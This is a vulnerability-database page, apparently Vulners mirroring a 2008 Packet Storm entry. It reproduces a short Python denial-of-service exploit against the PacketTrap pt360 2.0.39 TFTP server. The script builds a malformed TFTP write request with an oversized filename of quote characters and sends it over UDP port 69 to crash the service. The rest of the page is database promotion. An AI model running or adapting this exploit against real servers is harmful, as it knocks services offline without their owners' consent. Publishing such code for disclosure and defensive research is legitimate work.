Lucene search
K

pt360dos.py.txt

🗓️ 26 Mar 2008 00:00:00Reported by Mati AharoniType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Remote denial of service attack using PacketTrap Network's TFTPD exploit in Python script.

Code
`#!/usr/bin/python  
# PacketTrap Networks pt360 2.0.39 TFTPD Remote DOS   
# Coded by Mati Aharoni  
# muts..at..offensive-security.com  
# http://www.offensive-security.com/0day/pt360dos.py.txt  
  
import socket  
import sys  
  
host = '172.16.167.134'  
port = 69  
  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  
except:  
print "socket() failed"  
sys.exit(1)  
  
filename = '"'*160  
mode = "netascii"  
muha = "\x00\x02" + filename + "\0" + mode + "\0"  
s.sendto(muha, (host, port))  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Mar 2008 00:00Current
7.4High risk
Vulners AI Score7.4
19